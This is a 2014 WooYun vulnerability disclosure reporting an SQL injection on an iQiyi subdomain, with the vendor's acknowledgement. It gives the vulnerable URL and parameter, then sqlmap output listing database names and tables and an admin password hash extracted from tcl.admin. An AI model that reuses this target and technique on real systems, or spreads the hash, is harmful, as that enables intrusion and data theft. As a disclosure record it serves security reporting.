当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048691

漏洞标题:爱奇艺某分站sql注入漏洞一枚

相关厂商:奇艺

漏洞作者: IT P民

提交时间:2014-01-12 22:05

修复时间:2014-02-26 22:06

公开时间:2014-02-26 22:06

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-12: 细节已通知厂商并且等待厂商处理中
2014-01-12: 厂商已经确认,细节仅向厂商公开
2014-01-22: 细节向核心白帽子及相关领域专家公开
2014-02-01: 细节向普通白帽子公开
2014-02-11: 细节向实习白帽子公开
2014-02-26: 细节向公众公开

简要描述:

貌似是鸡肋,没继续深入,不过root连接mysql,确认挺危险的

详细说明:

问题链接
http://tcl.iqiyi.com/index.php?action=daoyanjianjie&id=14
获得当前用户

[23:27:01] [INFO] testing MySQL
[23:27:01] [INFO] confirming MySQL
[23:27:01] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL >= 5.0.0
[23:27:01] [INFO] fetching current user
current user:    'root@localhost'


获得数据库名

[23:22:45] [INFO] fetching database names
[23:22:45] [INFO] the SQL query used returns 14 entries
[23:22:45] [INFO] resumed: "information_schema"
[23:22:45] [INFO] resumed: "ccs"
[23:22:45] [INFO] resumed: "cmdb_vip"
[23:22:45] [INFO] resumed: "common_cms"
[23:22:45] [INFO] resumed: "hk"
[23:22:45] [INFO] resumed: "ims"
[23:22:45] [INFO] resumed: "mysql"
[23:22:45] [INFO] resumed: "suc"
[23:22:45] [INFO] resumed: "t_eye"
[23:22:45] [INFO] resumed: "tcl"
[23:22:45] [INFO] resumed: "tcl_test"
[23:22:45] [INFO] resumed: "test"
[23:22:45] [INFO] resumed: "weixin"
[23:22:45] [INFO] resumed: "wx"
available databases [14]:                                                                                                                                                           
[*] ccs
[*] cmdb_vip
[*] common_cms
[*] hk
[*] ims
[*] information_schema
[*] mysql
[*] suc
[*] t_eye
[*] tcl
[*] tcl_test
[*] test
[*] weixin
[*] wx


获得某个库所有表

[23:11:11] [INFO] starting 10 threads
[23:11:12] [INFO] retrieved: "tp_article"
[23:11:12] [INFO] retrieved: "tp_areply"
[23:11:12] [INFO] retrieved: "tp_access"
[23:11:12] [INFO] retrieved: "tp_flash"
[23:11:13] [INFO] retrieved: "tp_follow"
[23:11:13] [INFO] retrieved: "tp_adma"
[23:11:13] [INFO] retrieved: "tp_call"
[23:11:13] [INFO] retrieved: "tp_diymen_class"
[23:11:13] [INFO] retrieved: "tp_case"
[23:11:13] [INFO] retrieved: "tp_home"
[23:11:13] [INFO] retrieved: "tp_api"
[23:11:13] [INFO] retrieved: "tp_company"
[23:11:13] [INFO] retrieved: "tp_host"
[23:11:13] [INFO] retrieved: "tp_host_order"
[23:11:13] [INFO] retrieved: "tp_diymen_set"
[23:11:14] [INFO] retrieved: "tp_host_list_add"
[23:11:14] [INFO] retrieved: "tp_indent"
[23:11:14] [INFO] retrieved: "tp_function"
[23:11:14] [INFO] retrieved: "tp_lottery"
[23:11:14] [INFO] retrieved: "tp_keyword"
[23:11:14] [INFO] retrieved: "tp_classify"
[23:11:14] [INFO] retrieved: "tp_member_card_coupon"
[23:11:14] [INFO] retrieved: "tp_member_card_contact"
[23:11:14] [INFO] retrieved: "tp_member_card_create"
[23:11:14] [INFO] retrieved: "tp_dream"
[23:11:14] [INFO] retrieved: "tp_img"
[23:11:14] [INFO] retrieved: "tp_member_card_exchange"
[23:11:14] [INFO] retrieved: "tp_member"
[23:11:14] [INFO] retrieved: "tp_member_card_info"
[23:11:14] [INFO] retrieved: "tp_member_card_sign"
[23:11:15] [INFO] retrieved: "tp_member_card_vip"
[23:11:15] [INFO] retrieved: "tp_member_card_set"
[23:11:15] [INFO] retrieved: "tp_member_card_integral"


拿到了加密后的管理员密码,比较难解,算比较鸡肋的sql注入漏洞

[01:54:56] [INFO] fetching SQL SELECT statement query output: 'select user_pass from tcl.admin'
[01:54:56] [INFO] the SQL query used returns 1 entries
[01:54:56] [INFO] retrieved: "1c161ff0c3892f845d0cb4928287753e"
select user_pass from tcl.admin; [1]:                                                                                                                                               
[*] 1c161ff0c3892f845d0cb4928287753e


看起来这台主机并不是爱奇艺的,不过用着爱奇艺的子域名,就报给iqiyi了。
乱入同一台主机的一个公司的db weixin,可拖库,可看到其用户名密码啥的

QQ20140112-5.png


漏洞证明:

拿到了加密后的管理员密码,比较难解,算比较鸡肋的sql注入漏洞

[01:54:56] [INFO] fetching SQL SELECT statement query output: 'select user_pass from tcl.admin'
[01:54:56] [INFO] the SQL query used returns 1 entries
[01:54:56] [INFO] retrieved: "1c161ff0c3892f845d0cb4928287753e"
select user_pass from tcl.admin; [1]:                                                                                                                                               
[*] 1c161ff0c3892f845d0cb4928287753e

修复方案:

过滤参数

版权声明:转载请注明来源 IT P民@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-01-12 22:26

厂商回复:

谢谢您提供的漏洞,我们会加紧进行修复!

最新状态:

暂无

漏洞评价:

评论